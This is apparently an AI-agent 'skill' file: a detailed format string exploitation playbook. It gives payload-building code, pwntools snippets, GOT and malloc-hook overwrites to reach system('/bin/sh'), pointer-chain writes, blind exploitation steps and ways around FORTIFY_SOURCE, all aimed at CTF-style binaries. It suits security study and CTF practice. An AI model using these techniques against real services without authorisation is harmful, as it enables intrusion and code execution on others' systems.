---
name: format-string-exploitation
description: >-
  Format string exploitation playbook. Use when printf-family functions receive user-controlled format strings, enabling arbitrary stack reads (%p/%s), arbitrary memory writes (%n/%hn/%hhn), GOT/hook overwrites, and canary/libc/PIE leaks.
---

# SKILL: Format String Exploitation — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string.

## 0. RELATED ROUTING

- [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — combine format string leak with stack overflow for full exploit
- [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — format string is the primary canary/PIE/ASLR leak method
- [arbitrary-write-to-rce](../arbitrary-write-to-rce/SKILL.md) — convert format string write primitive to code execution targets
- [heap-exploitation](../heap-exploitation/SKILL.md) — heap address leak via format string for heap exploitation

---

## 1. VULNERABILITY IDENTIFICATION

### Vulnerable Pattern

```c
printf(user_input);          // VULNERABLE: user controls format string
fprintf(fp, user_input);     // VULNERABLE
sprintf(buf, user_input);    // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed
```

### Quick Test

```
Input: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p
If the output shows stack values (hex addresses), the format string bug is confirmed.
Look for 0x4141414141414141 in the output (0x41414141 on 32-bit) to find your input offset.
```

---

## 2. READING MEMORY

### Stack Leak (%p)

| Format | Action | Use |
|---|---|---|
| `%p` | Print next stack value as pointer | Sequential stack dump |
| `%N$p` | Print N-th parameter as pointer | Direct positional access |
| `%N$lx` | Same value as `%p`, printed as hex without the `0x` prefix (64-bit) | Consistent output across libcs |
| `%N$s` | Dereference N-th parameter as string pointer | Read memory at pointer value |

### Finding Your Input Offset

```python
# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0x1.0x4141414141414141...
#                                                                ↑ offset = 6 (example)
# Or automated (assumes `io` is a pwntools tube and the service loops):
for i in range(1, 30):
    io.sendline(f'AAAAAAAA%{i}$p'.encode())
    # recvline() returns bytes, so compare against a bytes literal
    if b'0x41414141' in io.recvline():
        print(f'Offset = {i}')
        break
```
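
When the whole dump arrives in a single reply, the offset can also be read off by splitting the output. This is a minimal sketch, assuming the `.`-separated probe shown above and glibc-style `%p` output; `find_input_offset` is a hypothetical helper, not part of pwntools.

```python
def find_input_offset(dump: bytes, marker: bytes = b"AAAAAAAA") -> int:
    """Return the 1-based %N$p index whose value equals the marker bytes.

    Assumes the probe was marker + b".%p" * k, so the reply looks like
    marker.<v1>.<v2>... with values printed as "0x..." or "(nil)".
    """
    # Little-endian: the bytes "AAAAAAAA" read back as 0x4141414141414141.
    wanted = int.from_bytes(marker, "little")
    fields = dump.strip().split(b".")[1:]  # drop the echoed marker itself
    for index, field in enumerate(fields, start=1):
        if field.startswith(b"0x") and int(field.decode(), 16) == wanted:
            return index
    raise ValueError("marker not found; dump more slots")


sample = b"AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0x1.0x4141414141414141"
offset = find_input_offset(sample)
print(offset)  # 6
```

For a 32-bit target, pass `marker=b"AAAA"` so the expected value becomes `0x41414141`.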

### Leaking Specific Values

| Target | Method | Stack Position |
|---|---|---|
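| Canary | `%N$p` where N = the canary's positional offset | On x86-64, usually the slot just below saved RBP: N ≈ input offset + buf_size/8, plus any padding; the low byte is 0x00 |
| Saved RBP | `%N$p` (slot just below the return address) | Leaks a stack address; other stack locations follow by fixed deltas |
| Return address | `%N$p` (slot right after saved RBP) | Leaks a .text address (PIE base = leak - offset of the return site in the binary) |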
| Libc address | `%N$p` where N points to `__libc_start_main+XX` return on stack | libc base = leak - offset |
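
The base calculations in the table all reduce to one subtraction followed by a sanity check. The sketch below assumes 4 KiB pages; `base_from_leak` is a hypothetical helper and the numbers are illustrative, not taken from a real binary.

```python
PAGE_MASK = 0xFFF  # assumes 4 KiB pages


def base_from_leak(leak: int, known_offset: int) -> int:
    """Subtract the leaked location's in-file offset and check page alignment."""
    base = leak - known_offset
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page-aligned; wrong offset or wrong libc?")
    return base


# Illustrative: a return address that sits 0x1249 bytes into a PIE binary.
pie_base = base_from_leak(0x55D3C4A01249, 0x1249)
print(hex(pie_base))  # 0x55d3c4a00000
```

A base that is not page-aligned is a strong hint that the offset (or the libc version it came from) is wrong, so failing early here saves debugging later.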

### Reading Arbitrary Address (%s)

```
# 32-bit: place the address at the start of the format string
payload = p32(target_addr) + b'%N$s'  # N = offset where target_addr appears on the stack

# 64-bit: the address contains null bytes → place it AFTER the format specifiers
# Example for input at offset 6: the 8-byte prefix fills slot 6, so the address is slot 7
payload = b'%7$sAAAA' + p64(target_addr)
```
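
The slot index in the 64-bit payload depends on how many 8-byte words the specifier part occupies, which is easy to get wrong by one. A minimal sketch of that arithmetic using only `struct`; `build_read_payload` is a hypothetical helper and the address is a made-up example.

```python
import struct

WORD = 8  # bytes per stack slot on x86-64


def build_read_payload(input_offset: int, target_addr: int) -> bytes:
    """Build b'%K$s' + padding + address, with K pointing at the address slot."""
    slot = input_offset + 1  # first guess: the specifier fits in one word
    while True:
        prefix = f"%{slot}$s".encode()
        padded_len = -(-len(prefix) // WORD) * WORD  # round up to whole words
        needed_slot = input_offset + padded_len // WORD
        if needed_slot == slot:
            break
        slot = needed_slot  # specifier grew past a word boundary; retry
    return prefix.ljust(padded_len, b"A") + struct.pack("<Q", target_addr)


payload = build_read_payload(6, 0x404018)
print(payload)
```

The padding bytes are printed after the leaked string, and `%s` stops at the first null byte of the target, so a read of a pointer usually returns six bytes or fewer.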

---

## 3. WRITING MEMORY (%n)

### Write Specifiers

| Specifier | Bytes Written | Value Written |
|---|---|---|
| `%n` | 4 bytes (int) | Characters printed so far |
| `%hn` | 2 bytes (short) | Characters printed so far (mod 0x10000) |
| `%hhn` | 1 byte (char) | Characters printed so far (mod 0x100) |
| `%ln` | 8 bytes (long, on 64-bit Linux) | Characters printed so far |
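
The truncation in the table is what makes it possible to write a small value after a large one: the padding only has to reach the target modulo the write width. A short sketch of that arithmetic, assuming LP64 sizes; both function names are hypothetical.

```python
WIDTHS = {"%hhn": 1, "%hn": 2, "%n": 4, "%ln": 8}  # bytes stored, assuming LP64


def stored_value(chars_printed: int, specifier: str) -> int:
    """Bit pattern that lands in memory for a given character count."""
    mask = (1 << (8 * WIDTHS[specifier])) - 1
    return chars_printed & mask


def padding_for(target: int, already_printed: int, specifier: str) -> int:
    """Extra characters to print so the next write stores `target`."""
    modulus = 1 << (8 * WIDTHS[specifier])
    return (target - already_printed) % modulus


print(hex(stored_value(0x12345, "%hn")))  # 0x2345
print(padding_for(0x34, 0x50, "%hhn"))    # 228
```

In the second call, 0x50 characters are already out and the next byte must be 0x34, so printing 228 more wraps the counter to 0x134 and `%hhn` stores 0x34.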

### Arbitrary Write Technique

**Goal**: Write value `V` to address `A`.

**32-bit** (address on stack directly):
```python
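from pwn import p32

# Write 2 bytes at a time using %hn
# Place target addresses at the start of the format string (they land on the stack)
payload  = p32(target_addr)       # receives the low 2 bytes
payload += p32(target_addr + 2)   # receives the high 2 bytes
low = value & 0xffff
high = (value >> 16) & 0xffff
# 8 bytes (the two addresses) are already printed; pad modulo 0x10000
pad1 = (low - 8) % 0x10000
pad2 = (high - low) % 0x10000
# Skip the %c when no padding is needed, since %0c still prints one character
payload += (f'%{pad1}c' if pad1 else '').encode() + f'%{offset}$hn'.encode()
payload += (f'%{pad2}c' if pad2 else '').encode() + f'%{offset+1}$hn'.encode()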
```

**64-bit** (address AFTER format string):
```python
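# Addresses contain null bytes (0x00007fXXXXXXXXXX), which terminate the string
# Solution: place addresses AFTER the format specifiers

# Step 1: format string portion (no null bytes)
#   X, Y = padding counts; N, M = slots where the appended addresses land
#   (N = input offset + len(padded fmt) // 8, M = N + 1)
fmt = b'%Xc%N$hn%Yc%M$hn'
# Step 2: pad to a multiple of 8 bytes so the addresses fill whole stack slots
fmt = fmt.ljust((len(fmt) + 7) & ~7, b'A')
# Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)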
```
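
The template above can be turned into a concrete builder by reserving a fixed number of bytes for the specifiers, which pins down the slot numbers before the string is assembled. This is a sketch under stated assumptions: it writes only the low 32 bits of the value (enough when the upper bytes of the target already hold zero), `build_hn_write64` is a hypothetical name, and the addresses are examples.

```python
import struct


def build_hn_write64(offset: int, addr: int, value: int, fmt_len: int = 48) -> bytes:
    """Write the low 32 bits of `value` to `addr` as two %hn halves.

    offset  : positional index of the first 8 bytes of our input
    fmt_len : bytes reserved for the specifier part (multiple of 8)
    """
    if fmt_len % 8:
        raise ValueError("fmt_len must be a multiple of 8")
    first_slot = offset + fmt_len // 8  # where the first appended address lands
    halves = [(addr, value & 0xFFFF), (addr + 2, (value >> 16) & 0xFFFF)]
    halves.sort(key=lambda half: half[1])  # smaller count first, so padding never wraps

    fmt, tail, printed = b"", b"", 0
    for i, (dst, want) in enumerate(halves):
        pad = want - printed  # never negative because of the sort
        if pad:
            fmt += f"%{pad}c".encode()
        fmt += f"%{first_slot + i}$hn".encode()
        printed = want
        tail += struct.pack("<Q", dst)
    if len(fmt) > fmt_len:
        raise ValueError("specifiers exceed the reserved space; raise fmt_len")
    return fmt.ljust(fmt_len, b"A") + tail


payload = build_hn_write64(offset=6, addr=0x404018, value=0x401196)
print(payload[:22])  # b'%64c%12$hn%4438c%13$hn'
```

Sorting by value means the high half (0x0040) is written before the low half (0x1196); the order of the appended addresses follows the same sort, so each `%hn` still hits the right two bytes.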

### Byte-by-Byte Write with %hhn

Write one byte at a time so every padding count stays below 256 (6 writes cover a 48-bit address on 64-bit, provided the top two bytes of the target slot are already zero):

```python
writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    writes[target_addr + i] = byte_val

# pwntools handles the math:
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
```

---

## 4. PWNTOOLS fmtstr_payload()

```python
from pwn import *

# Overwrite GOT entry with target address
payload = fmtstr_payload(
    offset,                    # stack offset where input appears
    {elf.got['printf']: libc.symbols['system']},  # {addr: value}
    numbwritten=0,             # bytes already output before our input
    write_size='short'         # 'byte', 'short', or 'int'
)

# For 64-bit, set context.arch = 'amd64' (or context.binary = elf) first;
# recent pwntools versions then place the addresses after the specifiers automatically
```

### FmtStr Class (Interactive Exploitation)

```python
from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)
# fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
```

---

## 5. GOT OVERWRITE VIA FORMAT STRING

### Common Targets

| Overwrite | With | Trigger |
|---|---|---|
| `printf@GOT` | `system` | Next `printf(user_input)` → `system(user_input)`, send `/bin/sh` |
| `strlen@GOT` | `system` | If `strlen(user_input)` called |
| `puts@GOT` | `system` | If `puts(user_input)` called |
| `atoi@GOT` | `system` | If `atoi(user_input)` called (send `sh` as "number") |
| `__stack_chk_fail@GOT` | Controlled addr | Corrupt the canary on purpose; the failed check then calls the controlled address |
| `exit@GOT` | `main` | Create infinite loop for multi-shot exploit |

### Hook Targets (glibc < 2.34)

| Target | Overwrite With | Trigger |
|---|---|---|
| `__malloc_hook` | one_gadget addr | `printf` with a very large field width (e.g. `%100000c`) → internal `malloc` |
| `__free_hook` | `system` | Trigger `free()` on a buffer that starts with `/bin/sh` |

---

## 6. STACK POINTER CHAIN EXPLOITATION

When the format string is **not on the stack** (e.g., stored in a heap or .bss buffer referenced by a stack pointer), you cannot place target addresses in it. Use pointer chains that already exist on the stack to achieve an arbitrary write.

### Two-Stage Write

```
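Stack:
  [offset A] → ptr_X (stack value that points at the slot at offset B)
  [offset B] → ptr_Y (the slot ptr_X points to; holds another stack address)

Stage 1: Use %A$hn to write through ptr_X → overwrites ptr_Y's low bytes so ptr_Y = target_addr
Stage 2: Use %B$n to write through the modified ptr_Y → writes to target_addr
(Run the stages in separate printf calls: glibc may fetch positional arguments before the first write lands.)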
```

This requires finding **existing pointer chains** on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).

### Finding Pointer Chains

```python
# Leak the stack with %p and look for:
# 1. Slot N holding stack address A, where A is the address of another slot M
# 2. Slot M holding stack address B
# Write through A (using %N$hn) to change B's low bytes, i.e. where B points
# Then write through B (using %M$hn) to reach the target
```
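
The indirection is easier to follow with a toy memory model. The sketch below emulates the effect of `%K$hn` on a dictionary of 64-bit words; all addresses and values are invented for illustration, and `emulate_hn` is a hypothetical helper that models printf's behavior rather than calling it.

```python
def emulate_hn(memory: dict, slot_addr: int, count: int) -> None:
    """Model `%K$hn`: follow the pointer stored in the slot, overwrite 2 bytes there.

    `memory` maps 8-byte-aligned addresses to 64-bit words (a toy model).
    """
    pointer = memory[slot_addr]
    old = memory.get(pointer, 0)
    memory[pointer] = (old & ~0xFFFF) | (count & 0xFFFF)


SLOT_A = 0x7FFD0000E010  # holds a pointer to SLOT_B
SLOT_B = 0x7FFD0000E040  # holds some other stack address
TARGET = 0x7FFD0000E068  # e.g. a saved return address we want to edit

memory = {
    SLOT_A: SLOT_B,
    SLOT_B: 0x7FFD0000E0A8,
    TARGET: 0x401234,
}

# Stage 1 (first printf call): write through slot A to retarget slot B.
emulate_hn(memory, SLOT_A, TARGET & 0xFFFF)
# Stage 2 (second printf call): write through the retargeted slot B.
emulate_hn(memory, SLOT_B, 0x1337)

print(hex(memory[SLOT_B]))  # 0x7ffd0000e068
print(hex(memory[TARGET]))  # 0x401337
```

Because stage 1 changes only the low 16 bits, the target must share its upper bytes with the address already stored in slot B, which is why stack-to-stack chains are the usual choice.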

---

## 7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.

### Methodology

| Step | Action | Purpose |
|---|---|---|
| 1 | Send `%p` × 50 | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs |
| 3 | Find input offset | Send `AAAAAAAA%N$p` for N=1..50, find 0x4141414141414141 (0x41414141 on 32-bit) |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | If binary base known, read GOT via `%N$s` with GOT address |
| 6 | Calculate libc base | GOT value - libc symbol offset |
| 7 | Overwrite GOT | `%n` to rewrite GOT entry with system address |
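
Step 2 can be partly automated by bucketing each leaked value by address range. The ranges below are rough heuristics for typical Linux x86-64 layouts with ASLR and are assumptions, not guarantees; `classify_leak` and `parse_dump` are hypothetical helpers.

```python
def classify_leak(value: int) -> str:
    """Guess which region a leaked 64-bit value belongs to (heuristic only)."""
    if value == 0:
        return "null"
    if 0x7FFC00000000 <= value <= 0x7FFFFFFFFFFF:
        return "stack"
    if 0x7F0000000000 <= value < 0x7FFC00000000:
        return "libc/mmap"
    if 0x550000000000 <= value < 0x570000000000:
        return "pie/heap"
    if 0x400000 <= value < 0x1000000:
        return "non-pie"
    return "unknown"


def parse_dump(dump: bytes) -> list:
    """Split a '.'-separated %p dump into (index, value, guess) tuples."""
    rows = []
    for index, field in enumerate(dump.strip().split(b"."), start=1):
        value = 0 if field == b"(nil)" else int(field.decode(), 16)
        rows.append((index, value, classify_leak(value)))
    return rows


sample = b"0x7ffd12340000.(nil).0x7f1234567890.0x55d3c4a01249.0x4141414141414141"
for index, value, guess in parse_dump(sample):
    print(f"%{index}$p = {value:#x} ({guess})")
```

Values tagged `pie/heap` are ambiguous on purpose, since the heap usually sits shortly after a PIE binary; comparing several leaks and their low 12 bits helps tell them apart.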

---

## 8. FORTIFY_SOURCE BYPASS

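With `_FORTIFY_SOURCE=2` (gcc `-D_FORTIFY_SOURCE=2` plus optimization), `printf` is compiled to `__printf_chk`. In glibc this aborts on any `%n` variant when the format string sits in writable memory (`*** %n in writable segment detected ***`) and rejects positional specifiers that skip arguments (`%N$` requires `%1$` through `%(N-1)$` to be used as well).

### Bypass Techniques

| Method | Detail |
|---|---|
| Leak without gaps | Sequential `%p%p%p...` or gap-free `%1$p%2$p...%N$p` still dumps the stack |
| Use `%hn` sequentially (no positional) | Print exact byte count, `%hn`, adjust, `%hn`; fragile, and only works where the writable-segment `%n` check does not apply |
| Stack-based exploit | If the format string is on the stack, use non-positional `%n` with stack position control; subject to the same `%n` check |
| Heap overflow instead | FORTIFY's format checks do not stop heap bugs; combine with a heap primitive |
| Return-to-printf | ROP to call unfortified `printf` (if available in binary or libc) |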

---

## 9. 64-BIT CONSIDERATIONS

| Challenge | Solution |
|---|---|
| Addresses contain `\x00` (null byte terminates format string) | Place addresses AFTER format specifiers, pad to alignment |
| Address width: 6 significant bytes | Write 3 × `%hn` (2 bytes each) or 6 × `%hhn` |
| Larger stack offset range | `%1$` to `%5$` read RSI, RDX, RCX, R8, R9 (RDI holds the format pointer), so stack slots start at offset 6 |
| 48-bit address space | Only bottom 48 bits of 64-bit used |

### Layout Template (64-bit)

```
[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →
```

---

## 10. DECISION TREE

```
Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → %n aborts if the format string is writable (glibc); %N$ must not skip arguments
│   │   ├── Leak only? → sequential %p or gap-free %1$p%2$p...
│   │   └── Need a write? → combine with another primitive (heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│   └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes
```

Source

Creator's repository · yaklang/hack-skills
